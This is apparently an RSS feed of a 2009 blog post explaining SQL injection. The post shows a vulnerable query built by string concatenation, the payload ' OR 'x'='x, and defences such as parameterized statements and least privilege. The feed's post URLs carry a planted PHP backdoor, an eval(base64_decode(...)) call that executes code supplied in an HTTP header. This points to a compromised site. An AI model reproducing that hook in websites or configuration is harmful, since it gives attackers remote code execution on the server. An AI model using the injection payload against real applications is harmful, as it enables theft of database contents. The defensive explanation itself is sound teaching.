Knowledge@adpsconsulting.com » SQL injection http://adpsconsulting.com/knowledge Knowledge@ADPS Wed, 05 Aug 2009 10:00:30 +0000 http://wordpress.org/?v=2.8 en hourly 1 Security Threats – II: SQL Injection http://adpsconsulting.com/knowledge/2009/08/05/security-threats-ii-sql-injection/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/ http://adpsconsulting.com/knowledge/2009/08/05/security-threats-ii-sql-injection/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments Wed, 05 Aug 2009 09:59:37 +0000 ADPS Admin http://adpsconsulting.com/knowledge/?p=147 In this article, the second in our website security attacks series, we look at the hows and whys of SQL injection.
SQL injection involves compromising the security of an application by insertion or injection of an SQL query via the input data from the client to the application. This can happen when the input data is not correctly filtered for string literal escape cahracters. Successful SQL exploits can read data from the database and DBMS files, make modifications to it and execute administrative functions on the database.
How does this work? Let’s take a simple query
Select * from user_details where username = ;
The webpage probably has something similar to the following to capture the username and pass it on to the  backend:
string userName = field.getUserName();
string query = “Select * from user_details where username = ‘” + userName + “’”;
If a malicious user wanted to obtain the contents of the entire table (and the application is vulnerable to SQL injection attacks), all he would have to do is, instead of just typing in a username, he’d input <m_user’ OR ‘x’='x>. When this gets inserted into the query, the query gets transformed into
Select * from user_details where username = ‘m_user’ OR ‘x’='x’;
Because ‘x’ always equals ‘x’; the condition is always true and the query, which essentially converts into ‘Select * from user_details;’  returns the entire contents of the table user_details.
Hackers can make use of this vulnerability to obtain data and perpetrate malicious attacks on websites. Some databases allow multiple SQL statements separated by semicolons to be executed as a batch, allowing the attacker to execute arbitrary commands on the database.
How can you avoid such an attack on your website? A simple approach is to accept characters only from an allowed list of safe characters. This provides a first layer of security for the application. Another way is to use parameterized statements and stored procedures. Also, it must be ensured that the account with the least privileges is used for all user interactions. These precautions will go a long way in preventing your site from being hacked.
http://www.owasp.org/index.php/Guide_to_SQL_Injection; http://en.wikipedia.org/wiki/SQL_injection; http://www.owasp.org/index.php/SQL_injection

In this article, the second in our series of articles on website security attacks, we look at the hows and whys of SQL injection.

SQL injection involves compromising the security of an application by insertion or injection of an SQL query via the input data from the client to the application. This can happen when the input data is not correctly filtered for string literal escape characters. Successful SQL exploits can read data from the database and DBMS files, make modifications to it and execute administrative functions on the database.

How does this work? Let’s take a simple query:

Select * from user_details where username = ;

The web page probably has something similar to the following to capture the username and pass it on to the  backend:

{ …

string userName = field.getUserName();

string query = “Select * from user_details where username = ‘” + userName + “’”;

…}

If a malicious user wanted to obtain the contents of the entire table (and the application is vulnerable to SQL injection attacks), instead of just typing in a username, he’d input <m_user’ OR ‘x’='x>. When this gets inserted into the query, the query gets transformed into:

Select * from user_details where username = ‘m_user’ OR ‘x’='x’;

Because ‘x’ always equals ‘x’, the condition is always true and the query, which essentially converts into ‘Select * from user_details;’ returns the entire contents of the table user_details.

Hackers can make use of this vulnerability to obtain data and perpetrate malicious attacks on websites. Some databases allow multiple SQL statements separated by semicolons to be executed as a batch, allowing the attacker to execute arbitrary commands on the database.

How can you avoid such an attack on your website? A simple approach is to accept characters only from an allowed list of safe characters. This provides a first layer of security for the application. Another way is to use parameterized statements and stored procedures. Also, it must be ensured that the account with the least privileges is used for all user interactions. These precautions will go a long way in preventing your site from being hacked.

References: http://www.owasp.org/index.php/Guide_to_SQL_Injection; http://en.wikipedia.org/wiki/SQL_injection; http://www.owasp.org/index.php/SQL_injection

]]> http://adpsconsulting.com/knowledge/2009/08/05/security-threats-ii-sql-injection/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/ 1